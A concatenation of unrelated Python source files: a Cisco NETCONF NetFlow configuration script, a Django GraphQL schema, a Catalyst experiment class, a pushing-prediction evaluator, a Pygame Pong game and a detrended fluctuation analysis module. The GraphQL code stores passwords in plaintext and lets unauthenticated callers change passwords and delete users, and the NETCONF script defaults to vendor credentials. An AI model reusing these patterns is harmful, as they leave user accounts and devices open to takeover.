</monitor>\
</flow>
</native>
</config>
'''
netconf_reply = xml.dom.minidom.parseString(str(netconf_handler.edit_config(flow_record_payload.format(eta_record=proc_recordname, eta_exporter=proc_exportername, eta_exporter_ip=proc_exporter_ip, eta_exporter_port=proc_exporter_port, eta_monitor=proc_monitorname), target='running')))
print (netconf_reply.toprettyxml( indent = " " ))
if "<ok/>" in (netconf_reply.toprettyxml(indent = " ")):
return_val = True
else:
return_val = False
return return_val
if __name__ == '__main__':
parser = ArgumentParser(description='Select options.')
# Input parameters
parser.add_argument('--host', type=str, required=True,
help="The device IP or DN")
parser.add_argument('-u', '--username', type=str, default='cisco',
help="Go on, guess!")
parser.add_argument('-p', '--password', type=str, default='<PASSWORD>',
help="Yep, this one too! ;-)")
parser.add_argument('--port', type=int, default=830,
help="Specify this if you want a non-default port")
parser.add_argument('--recordname', type=str, default='fnf-eta-rec',
help="Specify the NetFlow Record name for ETA")
parser.add_argument('--exportername', type=str, default='fnf-eta-exp',
help="Specify the NetFlow exporter name for ETA")
parser.add_argument('--exporterip', type=str, required=True,
help="Specify the NetFlow exporter IP")
parser.add_argument('--exporterudpport', type=int, default=2055,
help="Specify the NetFlow UDP port number for ETA")
parser.add_argument('--monitorname', type=str, default='fnf-eta-mon',
help="Specify the NetFlow Monitor name for ETA")
args = parser.parse_args()
m = manager.connect(host=args.host,
port=args.port,
username=args.username,
password=args.password,
device_params={'name':"iosxe"})
#Step 1. Verify if switch has at least 16.9.1 image running on the box
if checkversion.verify_sw_version(m, min_major_release=16, min_minor_release=9, min_version=1):
print("Switch Image meets the required criteria. proceeding with the configuration")
else:
print("Switch not ready to configure the feature! Exiting the script")
exit()
#Step 2: Configure FlowRecord
if configure_flow_record(m, args.recordname, args.exportername, args.exporterip, args.exporterudpport, args.monitorname):
print("Configured")
else:
print("Something wrong with configuring NetFlow for ETA")
exit()
#
|
import graphene
from graphene_django import DjangoObjectType
from .models import User, Post
class UserType(DjangoObjectType):
class Meta:
model = User
fields = ("id", "name", "email")
class PostType(DjangoObjectType):
class Meta:
model = Post
fields = ("id", "title", "content", "date_posted", "last_updated", "author")
class Query(graphene.ObjectType):
all_users = graphene.List(UserType)
all_posts = graphene.List(PostType)
def resolve_all_users(root, info):
return User.objects.all()
def resolve_all_posts(root, info):
return Post.objects.all()
class UserAddMutation(graphene.Mutation):
class Arguments:
name = graphene.String(required=True)
email = graphene.String(required=True)
password = graphene.String(required=True)
user = graphene.Field(UserType)
ok = graphene.String()
@classmethod
def mutate(cls, root, info, name, email, password):
user = User(name=name, email=email, password=password)
user.save()
return UserAddMutation(user=user, ok="Successfully added user!")
class UserEditMutation(graphene.Mutation):
class Arguments:
_id = graphene.String(required=True)
password = graphene.String(required=True)
user = graphene.Field(UserType)
ok = graphene.String()
@classmethod
def mutate(cls, root, info, _id, password):
user = User.objects.get(id=_id)
user.password = password
user.save()
return UserEditMutation(user=user, ok="Successfully changed password")
class UserDeleteMutation(graphene.Mutation):
class Arguments:
_id = graphene.String(required=True)
user = graphene.Field(UserType)
ok = graphene.String()
@classmethod
def mutate(cls, root, info, _id):
user = User.objects.get(id=_id)
user.delete()
return UserDeleteMutation(user=user, ok="Successfully deleted user!")
class PostAddMutation(graphene.Mutation):
class Arguments:
title = graphene.String(required=True)
content = graphene.String(required=True)
author_id = graphene.String(required=True)
post = graphene.Field(PostType)
ok = graphene.String()
@classmethod
def mutate(cls, root, info, title, content, author_id):
author = User.objects.get(id=author_id)
if author is None:
return f"No author with id = {author_id} found!"
post = Post(title=title,content=content,author=author)
post.save()
return PostAddMutation(post=post, ok="Successfully added post!")
class PostEditMutation(graphene.Mutation):
class Arguments:
post_id = graphene.String(required=True)
title = graphene.String(required=False)
content = graphene.String(required=True)
post = graphene.Field(PostType)
ok = graphene.String()
@classmethod
def mutate(cls, root, info, post_id, content, title=None):
post = Post.objects.get(id=post_id)
if title is not None:
post.title = title
post.content = content
post.save()
return PostEditMutation(post=post, ok="Successfully edited post!")
class PostDeleteMutation(graphene.Mutation):
class Arguments:
post_id = graphene.String(required=True)
ok = graphene.String()
@classmethod
def mutate(cls, root, info, post_id):
post = Post.objects.get(id=post_id)
post.delete()
return PostDeleteMutation(ok="Successfully deleted post!")
class Mutation(graphene.ObjectType):
# Api calls related to user management
add_user = UserAddMutation.Field()
edit_user = UserEditMutation.Field()
delete_user = UserDeleteMutation.Field()
# Api calls related to user post management
add_post = PostAddMutation.Field()
edit_post = PostEditMutation.Field()
delete_post = PostDeleteMutation.Field()
schema = graphene.Schema(query=Query, mutation=Mutation)
|
<reponame>arjunshibu/catalyst
from typing import Any, Callable, Dict, List, Mapping, Union
from collections import OrderedDict
from copy import deepcopy
import torch
from torch import nn
from torch.utils.data import DataLoader
from catalyst.contrib.data.augmentor import Augmentor, AugmentorCompose
from catalyst.core.callback import Callback
from catalyst.core.experiment import IExperiment
from catalyst.experiments.functional import (
add_default_callbacks,
do_lr_linear_scaling,
get_model_parameters,
load_optimizer_from_checkpoint,
process_callbacks,
)
from catalyst.registry import (
CALLBACKS,
CRITERIONS,
MODELS,
OPTIMIZERS,
SCHEDULERS,
TRANSFORMS,
)
from catalyst.typing import Criterion, Model, Optimizer, Scheduler
from catalyst.utils.loaders import get_loaders_from_params
from catalyst.utils.misc import get_short_hash, get_utcnow_time, merge_dicts
class ConfigExperiment(IExperiment):
"""
Experiment created from a configuration file.
"""
STAGE_KEYWORDS = [ # noqa: WPS115
"criterion_params",
"optimizer_params",
"scheduler_params",
"data_params",
"transform_params",
"stage_params",
"callbacks_params",
]
def __init__(self, config: Dict):
"""
Args:
config: dictionary with parameters
"""
self._config: Dict = deepcopy(config)
self._trial = None
self._initial_seed: int = self._config.get("args", {}).get("seed", 42)
self._verbose: bool = self._config.get("args", {}).get(
"verbose", False
)
self._check_time: bool = self._config.get("args", {}).get(
"timeit", False
)
self._check_run: bool = self._config.get("args", {}).get(
"check", False
)
self._overfit: bool = self._config.get("args", {}).get(
"overfit", False
)
self._prepare_logdir()
self._config["stages"]["stage_params"] = merge_dicts(
deepcopy(
self._config["stages"].get("state_params", {})
), # saved for backward compatibility
deepcopy(self._config["stages"].get("stage_params", {})),
deepcopy(self._config.get("args", {})),
{"logdir": self._logdir},
)
self.stages_config: Dict = self._get_stages_config(
self._config["stages"]
)
def _get_logdir(self, config: Dict) -> str:
timestamp = get_utcnow_time()
config_hash = get_short_hash(config)
logdir = f"{timestamp}.{config_hash}"
return logdir
def _prepare_logdir(self): # noqa: WPS112
exclude_tag = "none"
logdir = self._config.get("args", {}).get("logdir", None)
baselogdir = self._config.get("args", {}).get("baselogdir", None)
if logdir is not None and logdir.lower() != exclude_tag:
self._logdir = logdir
elif baselogdir is not None and baselogdir.lower() != exclude_tag:
logdir_postfix = self._get_logdir(self._config)
self._logdir = f"{baselogdir}/{logdir_postfix}"
else:
self._logdir = None
def _get_stages_config(self, stages_config: Dict):
stages_defaults = {}
stages_config_out = OrderedDict()
for key in self.STAGE_KEYWORDS:
if key == "stage_params":
# backward compatibility
stages_defaults[key] = merge_dicts(
deepcopy(stages_config.get("state_params", {})),
deepcopy(stages_config.get(key, {})),
)
else:
stages_defaults[key] = deepcopy(stages_config.get(key, {}))
for stage in stages_config:
if (
stage in self.STAGE_KEYWORDS
or stage == "state_params"
or stages_config.get(stage) is None
):
continue
stages_config_out[stage] = {}
for key2 in self.STAGE_KEYWORDS:
if key2 == "stage_params":
# backward compatibility
stages_config_out[stage][key2] = merge_dicts(
deepcopy(stages_defaults.get("state_params", {})),
deepcopy(stages_defaults.get(key2, {})),
deepcopy(stages_config[stage].get("state_params", {})),
deepcopy(stages_config[stage].get(key2, {})),
)
else:
stages_config_out[stage][key2] = merge_dicts(
deepcopy(stages_defaults.get(key2, {})),
deepcopy(stages_config[stage].get(key2, {})),
)
return stages_config_out
@property
def initial_seed(self) -> int:
"""Experiment's initial seed value."""
return self._initial_seed
@property
def logdir(self):
"""Path to the directory where the experiment logs."""
return self._logdir
@property
def hparams(self) -> OrderedDict:
"""Returns hyperparameters"""
return OrderedDict(self._config)
@property
def trial(self) -> Any:
"""
Returns hyperparameter trial for current experiment.
Could be usefull for Optuna/HyperOpt/Ray.tune
hyperparameters optimizers.
Returns:
trial
Example::
>>> experiment.trial
optuna.trial._trial.Trial # Optuna variant
"""
return self._trial
@property
def distributed_params(self) -> Dict:
"""Dict with the parameters for distributed and FP16 methond."""
return self._config.get("distributed_params", {})
@property
def stages(self) -> List[str]:
"""Experiment's stage names."""
stages_keys = list(self.stages_config.keys())
return stages_keys
def get_stage_params(self, stage: str) -> Mapping[str, Any]:
"""Returns the state parameters for a given stage."""
return self.stages_config[stage].get("stage_params", {})
@staticmethod
def _get_model(**params):
key_value_flag = params.pop("_key_value", False)
if key_value_flag:
model = {}
for model_key, model_params in params.items():
model[model_key] = ConfigExperiment._get_model( # noqa: WPS437
**model_params
)
model = nn.ModuleDict(model)
else:
model = MODELS.get_from_params(**params)
return model
def get_model(self, stage: str):
"""Returns the model for a given stage."""
model_params = self._config["model_params"]
model = self._get_model(**model_params)
return model
@staticmethod
def _get_criterion(**params):
key_value_flag = params.pop("_key_value", False)
if key_value_flag:
criterion = {}
for key, key_params in params.items():
criterion[
key
] = ConfigExperiment._get_criterion( # noqa: WPS437
**key_params
)
else:
criterion = CRITERIONS.get_from_params(**params)
if criterion is not None and torch.cuda.is_available():
criterion = criterion.cuda()
return criterion
def get_criterion(self, stage: str) -> Criterion:
"""Returns the criterion for a given stage."""
criterion_params = self.stages_config[stage].get(
"criterion_params", {}
)
criterion = self._get_criterion(**criterion_params)
return criterion
def _get_optimizer(
self, stage: str, model: Union[Model, Dict[str, Model]], **params
) -> Optimizer:
# @TODO 1: refactoring; this method is too long
# @TODO 2: load state dicts for schedulers & criterion
# lr linear scaling
lr_scaling_params = params.pop("lr_linear_scaling", None)
if lr_scaling_params:
data_params = dict(self.stages_config[stage]["data_params"])
batch_size = data_params.get("batch_size")
per_gpu_scaling = data_params.get("per_gpu_scaling", False)
lr, lr_scaling = do_lr_linear_scaling(
lr_scaling_params=lr_scaling_params,
batch_size=batch_size,
per_gpu_scaling=per_gpu_scaling,
)
params["lr"] = lr
else:
lr_scaling = 1.0
# getting layer-wise parameters
layerwise_params = params.pop("layerwise_params", OrderedDict())
no_bias_weight_decay = params.pop("no_bias_weight_decay", True)
# getting model parameters
model_key = params.pop("_model", None)
model_params = get_model_parameters(
models=model,
models_keys=model_key,
layerwise_params=layerwise_params,
no_bias_weight_decay=no_bias_weight_decay,
lr_scaling=lr_scaling,
)
# getting load-from-previous-stage flag
load_from_previous_stage = params.pop(
"load_from_previous_stage", False
)
# instantiate optimizer
optimizer_key = params.pop("optimizer_key", None)
optimizer = OPTIMIZERS.get_from_params(**params, params=model_params)
# load from previous stage
if load_from_previous_stage and self.stages.index(stage) != 0:
checkpoint_path = f"{self.logdir}/checkpoints/best_full.pth"
optimizer = load_optimizer_from_checkpoint(
optimizer,
checkpoint_path=checkpoint_path,
checkpoint_optimizer_key=optimizer_key,
model_parameters=model_params,
optimizer_params=params,
)
return optimizer
def get_optimizer(
self, stage: str, model: Union[Model, Dict[str, Model]]
) -> Union[Optimizer, Dict[str, Optimizer]]:
"""
Returns the optimizer for a given stage.
Args:
stage: stage name
model (Union[Model, Dict[str, Model]]): model or a dict of models
Returns:
optimizer for selected stage
"""
optimizer_params = self.stages_config[stage].get(
"optimizer_params", {}
)
key_value_flag = optimizer_params.pop("_key_value", False)
if key_value_flag:
optimizer = {}
for key, params in optimizer_params.items():
# load specified optimizer from checkpoint
optimizer_key = "optimizer_key"
assert optimizer_key not in params, "keyword reserved"
params[optimizer_key] = key
optimizer[key] = self._get_optimizer(stage, model, **params)
else:
optimizer = self._get_optimizer(stage, model, **optimizer_params)
return optimizer
@staticmethod
def _get_scheduler(
*, optimizer: Union[Optimizer, Dict[str, Optimizer]], **params: Any
) -> Union[Scheduler, Dict[str, Scheduler]]:
optimizer_key = params.pop("_optimizer", None)
optimizer = optimizer[optimizer_key] if optimizer_key else optimizer
scheduler = SCHEDULERS.get_from_params(**params, optimizer=optimizer)
return scheduler
def get_scheduler(
self, stage: str, optimizer: Union[Optimizer, Dict[str, Optimizer]]
) -> Union[Scheduler, Dict[str, Scheduler]]:
"""Returns the scheduler for a given stage."""
params = self.stages_config[stage].get("scheduler_params", {})
key_value_flag = params.pop("_key_value", False)
if key_value_flag:
scheduler: Dict[str, Scheduler] = {}
for key, scheduler_params in params.items():
scheduler[key] = self._get_scheduler(
optimizer=optimizer, **scheduler_params
)
else:
scheduler = self._get_scheduler(optimizer=optimizer, **params)
return scheduler
@staticmethod
def _get_transform(**params) -> Callable:
key_value_flag = params.pop("_key_value", False)
if key_value_flag:
transforms_composition = {
transform_key: ConfigExperiment._get_transform( # noqa: WPS437
**transform_params
)
for transform_key, transform_params in params.items()
}
transform = AugmentorCompose(
{
key: Augmentor(
dict_key=key,
augment_fn=transform,
input_key=key,
output_key=key,
)
for key, transform in transforms_composition.items()
}
)
else:
if "transforms" in params:
transforms_composition = [
ConfigExperiment._get_transform( # noqa: WPS437
**transform_params
)
for transform_params in params["transforms"]
]
params.update(transforms=transforms_composition)
transform = TRANSFORMS.get_from_params(**params)
return transform
def get_transforms(
self, stage: str = None, dataset: str = None
) -> Callable:
"""
Returns transform for a given stage and dataset.
Args:
stage: stage name
dataset: dataset name (e.g. "train", "valid"),
will be used only if the value of `_key_value`` is ``True``
Returns:
Callable: transform function
"""
transform_params = deepcopy(
self.stages_config[stage].get("transform_params", {})
)
key_value_flag = transform_params.pop("_key_value", False)
if key_value_flag:
transform_params = transform_params.get(dataset, {})
transform_fn = self._get_transform(**transform_params)
if transform_fn is None:
def transform_fn(dict_): # noqa: WPS440
return dict_
elif not isinstance(transform_fn, AugmentorCompose):
transform_fn_origin = transform_fn
def transform_fn(dict_): # noqa: WPS440
return transform_fn_origin(**dict_)
return transform_fn
def get_loaders(
self, stage: str, epoch: int = None,
) -> "OrderedDict[str, DataLoader]":
"""Returns the loaders for a given stage."""
data_params = dict(self.stages_config[stage]["data_params"])
loaders = get_loaders_from_params(
get_datasets_fn=self.get_datasets,
initial_seed=self.initial_seed,
stage=stage,
**data_params,
)
return loaders
@staticmethod
def _get_callback(**params):
wrapper_params = params.pop("_wrapper", None)
callback = CALLBACKS.get_from_params(**params)
if wrapper_params is not None:
wrapper_params["base_callback"] = callback
callback = ConfigExperiment._get_callback( # noqa: WPS437
**wrapper_params
)
return callback
def get_callbacks(self, stage: str) -> "OrderedDict[Callback]":
"""Returns the callbacks for a given stage."""
callbacks_params = self.stages_config[stage].get(
"callbacks_params", {}
)
callbacks = OrderedDict()
for key, callback_params in callbacks_params.items():
callback = self._get_callback(**callback_params)
callbacks[key] = callback
callbacks = add_default_callbacks(
callbacks,
verbose=self._verbose,
check_time=self._check_time,
check_run=self._check_run,
overfit=self._overfit,
is_infer=stage.startswith("infer"),
is_logger=self.logdir is not None,
is_criterion=self.stages_config[stage].get("criterion_params", {}),
is_optimizer=self.stages_config[stage].get("optimizer_params", {}),
is_scheduler=self.stages_config[stage].get("scheduler_params", {}),
)
# NOTE: stage should be in self._config.stages
# othervise will be raised ValueError
stage_index = list(self.stages_config.keys()).index(stage)
process_callbacks(callbacks, stage_index)
return callbacks
__all__ = ["ConfigExperiment"]
|
import numpy as np
import matplotlib.pyplot as plt
import h5py
import torch
import os
from klampt.model.trajectory import Trajectory
from klampt.io.loader import save
from pdb import set_trace
def plot_pushing_error(bg, max_horiz=100):
test_data = bg.T.MTEST
test_ans = bg.MTestAnswers
test_structures = bg.S.TestStructures
plt.switch_backend("Qt5Agg")
DATA = h5py.File("pushing.hdf5", "r")
sse = np.zeros((max_horiz,))
sse_base = np.zeros((max_horiz,))
for i, (data, structure) in enumerate(zip(test_data, test_structures)):
_, _, _, _, _, weights, composer = bg.run_MAML(structure, data,
ret_weights=True)
inp = DATA[data.name + "-IN"]
out = DATA[data.name + "-OUT"]
nobj = out.shape[1] // 3
curr_state = inp
n_datapoints = 0
for k in range(max_horiz):
inp_tensor = bg.D.normalize_input(torch.from_numpy(curr_state[:-1,:])
.float().cuda())
out_tensor = composer.forward_with_weights(inp_tensor, weights)
pred_out = bg.D.denormalize_output(out_tensor).cpu().detach().numpy()
next_state = np.zeros((curr_state.shape[0]-1, curr_state.shape[1]))
next_state[:, -6:] = curr_state[1:, -6:]
for j in range(nobj):
next_state[:, 6*j:6*j+2] = (curr_state[:-1, 6*j:6*j+2]
+ pred_out[:, 3*j:3*j+2])
next_state[:, 6*j+2:6*j+4] = pred_out[:, 3*j:3*j+2]
next_state[:, 6*j+4] = (curr_state[:-1, 6*j+4] + pred_out[:, 3*j+2])
next_state[:, 6*j+5] = pred_out[:, 3*j+2]
sse[k] += np.sum((next_state[:, 6*j:6*j+2] - inp[k+1:, 6*j:6*j+2])**2,
axis=None)
sse_base[k] += np.sum((inp[:-(k+1), 6*j:6*j+2] - inp[k+1:, 6*j:6*j+2])**2,
axis=None)
sse[k] += np.sum((next_state[:, 6*j+4] - inp[k+1:, 6*j+4])**2,
axis=None)
sse_base[k] += np.sum((inp[:-(k+1), 6*j+4] - inp[k+1:, 6*j+4])**2,
axis=None)
n_datapoints += 3*next_state.shape[0]
curr_state = next_state
rmses = np.sqrt(sse/n_datapoints)
rmses_base = np.sqrt(sse_base/n_datapoints)
fig = plt.figure()
ax = fig.gca()
ax.plot(np.linspace(0.01, max_horiz*0.01, max_horiz), rmses)
ax.plot(np.linspace(0.01, max_horiz*0.01, max_horiz), rmses_base)
ax.legend(["Ours", "Naive Baseline"])
ax.set_xlabel("Prediction Horizon (s)")
ax.set_ylabel("RMSE")
ax.set_title("Pushing prediction error")
plt.show()
def save_predicted_trajs(bg, out_dir):
test_data = bg.T.MTEST
test_structures = bg.S.TestStructures
DATA = h5py.File("pushing.hdf5", "r")
for i, (data, structure) in enumerate(zip(test_data, test_structures)):
_, _, _, _, _, weights, composer = bg.run_MAML(structure, data,
ret_weights=True)
inp = DATA[data.name + "-IN"]
out = DATA[data.name + "-OUT"]
nobj = out.shape[1] // 3
curr_state = inp
milestones = np.zeros((299, 2 + 3*nobj))
for k in range(299):
milestones[k, :2] = curr_state[0, -6:-4]
for j in range(nobj):
milestones[k, 2+3*j:4+3*j] = curr_state[0, 6*j:6*j+2]
milestones[k, 4+3*j] = curr_state[0, 6*j+4]
inp_tensor = bg.D.normalize_input(torch.from_numpy(curr_state[:-1,:])
.float().cuda())
out_tensor = composer.forward_with_weights(inp_tensor, weights)
pred_out = bg.D.denormalize_output(out_tensor).cpu().detach().numpy()
next_state = np.zeros((curr_state.shape[0]-1, curr_state.shape[1]))
next_state[:, -6:] = curr_state[1:, -6:]
for j in range(nobj):
next_state[:, 6*j:6*j+2] = (curr_state[:-1, 6*j:6*j+2]
+ pred_out[:, 3*j:3*j+2])
next_state[:, 6*j+2:6*j+4] = pred_out[:, 3*j:3*j+2]
next_state[:, 6*j+4] = (curr_state[:-1, 6*j+4] + pred_out[:, 3*j+2])
next_state[:, 6*j+5] = pred_out[:, 3*j+2]
curr_state = next_state
traj = Trajectory(times=np.linspace(0.01, 2.99, 299), milestones=milestones)
save_name = os.path.join(out_dir, "pred_pose_" + data.name +".traj")
save(traj, 'auto', save_name)
|
import pygame
import os
import time
class Walls:
def __init__(self, pos, size, color):
self.pos = pos
self.size = size
self.color = color
self.rect = pygame.Rect(pos[0], pos[1], size[0], size[1])
def draw(self):
pygame.draw.rect(screen, self.color, (self.pos, self.size))
class Paddles:
def __init__(self, pos, size, color, vel):
self.starting_pos = pos
self.pos_x = int(pos[0])
self.pos_y = int(pos[1])
self.size = size
self.color = color
self.vel = vel
self.rect = pygame.Rect(self.pos_x, self.pos_y, size[0], size[1])
def update(self, pos_y):
self.pos_y += pos_y
self.rect.topleft = (self.pos_x, self.pos_y)
def draw(self):
pygame.draw.rect(screen, self.color, (self.rect.topleft, self.size))
class Balls:
def __init__(self, pos, size, color):
self.pos = pos
self.pos_x = pos[0]
self.pos_y = pos[1]
self.size = size
self.color = color
self.dx = 1
self.dy = 1
self.dead = False
self.points = 0
def draw(self):
pygame.draw.circle(screen, self.color, (self.pos_x, self.pos_y), self.size)
def update_ball_1p(self, leftp, rightp):
self.pos_x += self.dx
self.pos_y += self.dy
# Ako udre goren dzid
if self.pos_y > screenHeight - 20:
self.pos_y -= 5
self.dy *= -1
# Dolen dzid
elif self.pos_y < 25:
self.pos_y += 5
self.dy *= -1
# Desen dzid, u ovaj slucaj paddle
if self.pos_x >= rightp.pos_x:
if rightp.rect.collidepoint((self.pos_x, self.pos_y)):
self.pos_x -= 5
self.dx *= -1
self.points += 1
else:
# Ako ja promase paddle stavame deak e dead
self.dead = True
# Lev dzid ili player
elif leftp.rect.collidepoint((self.pos_x, self.pos_y)):
self.pos_x += 5
self.dx *= -1
def update_ball_2p(self, leftp, rightp):
self.pos_x += self.dx
self.pos_y += self.dy
# Ako udre goren dzid
if self.pos_y > screenHeight - 20:
self.pos_y -= 5
self.dy *= -1
# Dolen dzid
elif self.pos_y < 25:
self.pos_y += 5
self.dy *= -1
# Desen dzid, u ovaj slucaj toa e paddle
if self.pos_x >= rightp.pos_x:
if rightp.rect.collidepoint((self.pos_x, self.pos_y)):
self.pos_x -= 5
self.dx *= -1
else:
# Ako ja promase paddle stavame deak e dead
self.dead = True
# Lev dzid ili player
if self.pos_x <= leftp.pos_x:
if leftp.rect.collidepoint((self.pos_x, self.pos_y)):
self.pos_x += 5
self.dx *= -1
else:
self.dead = True
####################################################
# x, y position where to show the window
windowPosition = (20, 43)
os.environ['SDL_VIDEO_WINDOW_POS'] = "%d,%d" % windowPosition
screenWidth, screenHeight = 1000, 640
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
GRAY = (200, 200, 200)
GRAYB = (150, 150, 150)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
ORANGY = (255, 204, 0)
LBLUISH = (0, 255, 153)
PADDLE_COLOR = WHITE
WALLS_COLOR = (0, 204, 255) # (0, 153, 204)
pygame.init()
screen = pygame.display.set_mode((screenWidth, screenHeight))
pygame.display.set_caption('Pong')
font = pygame.font.Font(None, 50)
####################################################
paddleR = Paddles((screenWidth - 30, screenHeight / 2), (20, 100), PADDLE_COLOR, 2)
paddleL = Paddles((10, screenHeight / 2), (20, 100), PADDLE_COLOR, 2)
ball = Balls((100, 100), 10, WHITE)
walls_single = [Walls((screenWidth - 5, 0), (20, screenHeight), ORANGY),
Walls((0, 0), (20, screenHeight), WALLS_COLOR),
Walls((0, screenHeight - 20), (screenWidth, 20), WALLS_COLOR),
Walls((0, 0), (screenWidth, 20), WALLS_COLOR)]
walls_twop = [Walls((screenWidth - 5, 0), (20, screenHeight), ORANGY),
Walls((-15, 0), (20, screenHeight), ORANGY),
Walls((0, screenHeight - 20), (screenWidth, 20), WALLS_COLOR),
Walls((0, 0), (screenWidth, 20), WALLS_COLOR)]
def main_scene():
single_player = font.render("1 Player", True, WHITE)
single_rect = single_player.get_rect()
single_rect.center = (int(screenWidth / 2), 305)
two_player = font.render("2 Players", True, WHITE)
two_rect = two_player.get_rect()
two_rect.center = (int(screenWidth / 2), 345)
main = True
while main:
for event in pygame.event.get():
if event.type == pygame.QUIT:
main = False
if event.type == pygame.MOUSEBUTTONDOWN:
if single_rect.collidepoint(event.pos):
return False
elif two_rect.collidepoint(event.pos):
return True
screen.fill(LBLUISH)
screen.blit(single_player, single_rect)
screen.blit(two_player, two_rect)
pygame.display.flip()
return False
def dead_scene():
retry = font.render("Press R to try again", True, WHITE)
retry_pos = retry.get_rect()
retry_pos.center = (int(screenWidth / 2), int(screenHeight / 2))
menu_btn = font.render("Main menu", True, WHITE)
menu_btnpos = menu_btn.get_rect()
menu_btnpos.topleft = (30, 30)
dead = True
while dead:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
return running
# if event.type == pygame.MOUSEBUTTONDOWN:
# if menu_btnpos.collidepoint(event.type):
# main_menu = True
keys = pygame.key.get_pressed()
if keys[pygame.K_r]:
ball.dead = False
ball.pos_x, ball.pos_y = 500, 320
ball.dx *= -1
ball.dy *= -1
ball.points = 0
running = True
time.sleep(0.2)
return running
screen.fill(LBLUISH)
screen.blit(menu_btn, menu_btnpos)
screen.blit(retry, retry_pos)
pygame.display.flip()
def singleplayer():
# NZ ovoa dali treba i so prae uopste
# pygame.time.delay(5)
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if ball.dead:
running = dead_scene()
keys = pygame.key.get_pressed()
if keys[pygame.K_UP] and paddleR.pos_y - 25 > paddleR.vel:
paddleR.update(-paddleR.vel)
if keys[pygame.K_DOWN] and paddleR.pos_y < screenHeight - paddleR.size[1] - 25:
paddleR.update(paddleR.vel)
screen.fill(LBLUISH)
for wal in walls_single:
wal.draw()
paddleR.draw()
ball.update_ball_1p(walls_single[1], paddleR)
ball.draw()
points = font.render(f"Score: {str(ball.points)}", True, WHITE)
screen.blit(points, (50, 30))
pygame.display.flip()
def twoplayers():
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
if ball.dead:
running = dead_scene()
keys = pygame.key.get_pressed()
if keys[pygame.K_UP] and paddleR.pos_y - 25 > paddleR.vel:
paddleR.update(-paddleR.vel)
if keys[pygame.K_DOWN] and paddleR.pos_y < screenHeight - paddleR.size[1] - 25:
paddleR.update(paddleR.vel)
if keys[pygame.K_w] and paddleL.pos_y - 25 > paddleL.vel:
paddleL.update(-paddleL.vel)
if keys[pygame.K_s] and paddleL.pos_y < screenHeight - paddleL.size[1] - 25:
paddleL.update(paddleL.vel)
screen.fill(LBLUISH)
for wal in walls_twop:
wal.draw()
paddleR.draw()
paddleL.draw()
ball.update_ball_2p(paddleL, paddleR)
ball.draw()
pygame.display.flip()
if __name__ == "__main__":
Players = main_scene()
# True for 2 players, False for 1 player
if Players:
twoplayers()
else:
singleplayer()
|
<filename>DFA.py<gh_stars>10-100
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 1 14:35:26 2017
@author: picku
This code carries out multifractal detrended fluctuation analysis (MF-DFA) as
described in:
Kantelhardt, <NAME>., et al. "Multifractal detrended fluctuation analysis of
nonstationary timer series." Physica A: Statistical Mechanics and its Applications
316.1 (2002): 87-114
Unlike standard DFA, which is used to analyze (mono-) fractal scaling properties
of nonstationary time series, MF-DFA allows for analysis of multi-fractal
nonstationary time series using one additional step - a q dependent averaging
procedure - where q = 2 performs the standard DFA procedure developed in:
<NAME>., et al. "Quantification of scaling exponents and crossover phenomena
in nonstationary heartbeat time series." Chaos: An Interdisciplinary Journal of
Nonlinear Science 5.1 (1995): 82-87
Characterizing the short- and long-range correrlation properties of the RR interval
time series (a non-stationary physiological signal) is helpful in determining
fluctuations due to the intrinsic dynamics of the cardio-respiratory system itself
and those fluctuations that arise from external (environmental) stimuli. The scaling
exponent, alpha, can be used to represent the autocorrelatin properties of the signal:
alpha < 1/2 : anti-correlated
alpha = 1/2 : uncorrelated (white noise)
alpha > 1/2 : correlated
alpha = 1 : 1/f-noise
alpha > 1 : non-stationary
alpha = 3/2 : Brownian noise (random walk)
"""
import numpy as np
import matplotlib.pyplot as plt
def dfa(timeSeries, scale, q, m):
'''
Input Arguments :
-timeSeries : [list] of RR intervals
-scale : [int]
-m : [int] order of polynomial fit
-q : [int] order of fluctuation coefficient
Output Arguments:
-F : [float] fluctuation coefficient
'''
if len(timeSeries) < scale:
print('Length of time series must be greater than scale')
else:
#Step(1): Determine the "profile" (integrated signal with subtracted offset)
integratedSeries = np.cumsum(timeSeries - np.mean(timeSeries)) #y_k
#Step(2): Divide profile into N non-overlapping segments of equal length s
shape = (int(integratedSeries.shape[0]) // int(scale), int(scale))
nwLength = shape[0] * shape[1]
windowedData = np.reshape(integratedSeries[0:int(nwLength)], shape)
#repeate same procedure from opposite end of integrated series
windowedData2 = np.reshape(integratedSeries[len(integratedSeries) - int(nwLength):], shape)
segments = np.concatenate((windowedData, windowedData2))
#Step(3): Calculate local trend for each 2Ns segments by a least squares fit of the series.
#Then determine the variance for each segment v, v = 1,...,Ns
x = np.arange(segments.shape[1])
rms = np.empty(segments.shape[0])
for i, segment in enumerate(segments):
pl = np.polyfit(x, segment, m)
y_n = np.polyval(pl, x)
rms[i] = np.sqrt(np.mean((segment - y_n) ** 2))
#(Step 4): Average over all segments to obtain the qth order fluctuation coefficient
F = np.mean(rms ** q) ** (1 / q)
return F
def scalingExponent(timeSeries, lowerScaleLimit, upperScaleLimit, scaleDensity, m, q, plot):
'''
Input Arguments :
- timeSeries : [list] of RR intervals
- lowerScaleLimit : [int] minimum of scales for MF-DFA
- upperScaleLimit : [int] maximum of scales for MF-DFA
- scaleDensity : [int] number of scales between lowerScaleLimit and upperScaleLimit in which DFA is conducted
- m : [int] order of polynomial fit
- q : [int] order of fluctuation coefficient
- plot : [1] --> plot of log(scales) vs log(F)
Output Arguments :
- H : [float] scaling exponent
'''
startBeatNum = np.log(lowerScaleLimit) / np.log(10)
stopBeatNum = np.log(upperScaleLimit) / np.log(10)
scales = np.floor(np.logspace(np.log10(10 ** startBeatNum), np.log10(10 ** stopBeatNum), scaleDensity))
F = np.zeros(scales.shape[0])
for j,scale in enumerate(scales):
F[j] = dfa(timeSeries, int(scale), q, m) #timeSeries = RR series to be analyzed
#Step(5) Determine scale behavior of the fluctuation functions by analyzing
#log-log plots of F versus s for each value of q
pl2 = np.polyfit(np.log2(scales), np.log2(F), 1) #m = 1 ---> linear fit
lineFit = np.polyval(pl2, np.log2(scales))
scaleParameter = pl2[0] #Finding scaling exponent (Hurst exponent = h(m = 2))
if plot == 1:
plt.loglog(scales, F, '.', markersize = 3)
